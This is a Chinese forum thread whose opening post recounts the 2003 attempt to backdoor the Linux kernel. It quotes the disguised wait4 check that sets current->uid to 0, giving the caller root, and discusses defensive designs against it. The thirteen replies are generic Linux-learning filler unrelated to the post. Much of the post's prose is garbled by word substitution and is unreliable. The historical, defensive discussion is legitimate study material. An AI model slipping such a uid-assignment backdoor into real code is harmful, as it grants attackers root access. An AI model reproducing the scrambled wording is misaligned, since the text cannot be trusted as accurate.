仓酷云

 找回密码
 立即注册
搜索
热搜: 活动 交友 discuz
查看: 608|回复: 13
打印 上一主题 下一主题

[其他Linux] Linux教程之回忆Linux内核后门仓酷云

[复制链接]
变相怪杰 该用户已被删除
跳转到指定楼层
楼主
发表于 2015-1-18 11:22:51 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式

马上注册,结交更多好友,享用更多功能,让你轻松玩转社区。

您需要 登录 才可以下载或查看,没有帐号?立即注册

x
在linux中学习命令的最好办法是学习Shell脚本编程,Shell脚本比起其他语言来学习简单,但是功能却十分强大.通过学习Shell编程,能让你掌握大量的linux命令。
因为比来公共对美国国度平安局(NAS)的存眷,人们的注重力转移到后门程序上。关于不熟习该术语的人们,后门是一种成心在操纵体系或软件中植进的毛病,同意未受权的用户会见体系。在2003年已经有人试图向Linux内核植进后门,固然被发明了,可是这标明不管看上往多一般的变动城市引进毛病,和源码把持办理的主要性。
Corbet在LVN.Net的文章中初次提到以下这段代码,它把本人假装成相似wait4函数的参数校验。
  1. if((options==(__WCLONE|__WALL))&&(current->uid=0))retval=-EINVAL;
复制代码
一般情形下没有任何影响,可是假如挪用程序存心传进不法值,if表达式的第二部分就会实行。该部分会将程序的用户ID(current->uid)设为0,在Linux中就是root用户。
一眼看上往这就像是一个复杂的代码毛病,开辟职员常常忽略将==写成=。固然你以为函数wait4不该该与用户ID有任何干系,可是很分明这是存心为为之。
Corbet形貌了该后门是怎样被发明的
CVS库中的每一个变动城市包括反向链接信息,标明与BitKeeper中的变动不异。有成绩的变动短少如许的信息,以是很快就可以识别出来。

试图经由过程这类体例举行变动是很可疑的,最少能够这么说,以是我们十分存眷变动哀求究竟是甚么。
打击者已经再次向BitKeeper库的CVS克隆库中植进后门。他持续说道
CVS代码库是从BitKeeper天生的,可是补钉程序进进BitKeeper代码库其实不经由它。以是有成绩的代码只会影响基于CVS代码库事情的用户。刊行商利用的内核不是来自该库,此次变乱也申明,成绩代码可以驻留很长一段工夫。
人人设想一下,假如有人向代码库倡议如许的打击,增添几行看上往很好的代码,实践上植进了一个后门,而代码库没有Linux内核团队的把持和严厉反省,你怎样回护本人不受打击。
一种体例是在使用程序中创立本人的“内核”,只要这段代码能够改动用户的脚色和权限。其他的代码只是猎取到用户权限的只读视图,如许他们就不克不及容易得猎取root权限。
在如许的模子中,"current->uid=0"如许的代码不会编译。假如任何人想实行打击,或是间接修正使用程序的平安模块,可是我们会亲切存眷如许的修正,或是利用反射的手段,可是反射代码一定比复杂的赋值操纵更简单被发觉到。
假如言语层面撑持,一种更好的体例是利用户权限完整不成变。这类体例可以更年夜水平限定打击产生的中央,只能是创立权限的中央。

如果你让他去用linux搭建一个web服务器,做一个linux网关,他就什么都不会了.他们把时间都浪费在了版本的转换上了.
柔情似水 该用户已被删除
沙发
发表于 2015-1-20 22:29:09 | 只看该作者
为了更好的学习这门课程,我不仅课上认真听讲,课下也努力学习,为此还在自己的电脑上安装了Ubuntu系统。
乐观 该用户已被删除
板凳
发表于 2015-1-21 13:08:56 | 只看该作者
一些显而易见的小错误还是用vi改正比较方便。以后的大一点的程序就得在Linux下调试了,因为有的头文件在VC里面说找不到。?
蒙在股里 该用户已被删除
地板
发表于 2015-1-26 17:28:24 | 只看该作者
我想即使Linux高手也很难快速准确精练的回答你。
爱飞 该用户已被删除
5#
发表于 2015-1-26 23:56:13 | 只看该作者
主流Linux发行版都自带非常详细的文档(包括手册页和FAQ),从系统安装到系统安全,针对不同层次的人的详尽文档,仔细阅读文档后40%问题都可在此解决。
透明 该用户已被删除
6#
发表于 2015-2-5 14:33:40 | 只看该作者
另外Linux上也有很多的应用软件,安装运行了这些软件后,你就可以在Linux上编辑文档、图?片,玩游戏、上网、播放多媒体文件等。
只想知道 该用户已被删除
7#
发表于 2015-2-9 07:53:13 | 只看该作者
虽然大家都比较喜欢漂亮的mm,但是在学 linux 的过程中,还是要多和“男人”接触一下:P 遇到问题的时候,出来看说和上网查之外,就是要多用 linux 下的 man 命令找找帮助。
分手快乐 该用户已被删除
8#
发表于 2015-2-17 09:18:52 | 只看该作者
永中office 2004增强版安装只需要默认安装即可使用并操作大多与win系统雷同,打印机的配置和管理,记录光盘等。
深爱那片海 该用户已被删除
9#
发表于 2015-2-19 21:33:48 | 只看该作者
你需要提供精确有效的信息。Linux这并不是要求你简单的把成吨的出错代码或者数据完全转储摘录到你的提问中。
第二个灵魂 该用户已被删除
10#
发表于 2015-2-24 04:43:20 | 只看该作者
学习Linux,应该怎样学,主要学些什么,一位Linux热心学习者,一段学习Linux的风云经验,历时十二个小时的思考总结,近十位网络Linux学习者权威肯定,为您学习Linux指明方向。
简单生活 该用户已被删除
11#
发表于 2015-2-26 03:29:05 | 只看该作者
你需要提供精确有效的信息。Linux这并不是要求你简单的把成吨的出错代码或者数据完全转储摘录到你的提问中。
精灵巫婆 该用户已被删除
12#
发表于 2015-3-8 11:40:58 | 只看该作者
说实话小时候没想过搞IT,也计算机了解也只是一些皮毛,至于什么UNIX,Linux,听过没见过,就更别说用过了。?
再见西城 该用户已被删除
13#
发表于 2015-3-15 22:24:00 | 只看该作者
掌握硬件配置,如显卡,声卡,网卡等,硬件只要不是太老或太新一般都能被支持,作为一名Linux系统管理员建议多阅读有关硬件配置文章,对各种不支持或支持不太好的硬件有深刻的了解。
飘灵儿 该用户已被删除
14#
发表于 2015-3-22 17:05:30 | 只看该作者
然我们对Linux的学习首先是通过对它的产生,发展,到今天仍然在不断完善开始的。
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

QQ|Archiver|手机版|仓酷云 鄂ICP备14007578号-2

GMT+8, 2024-12-24 04:27

Powered by Discuz! X3.2

© 2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表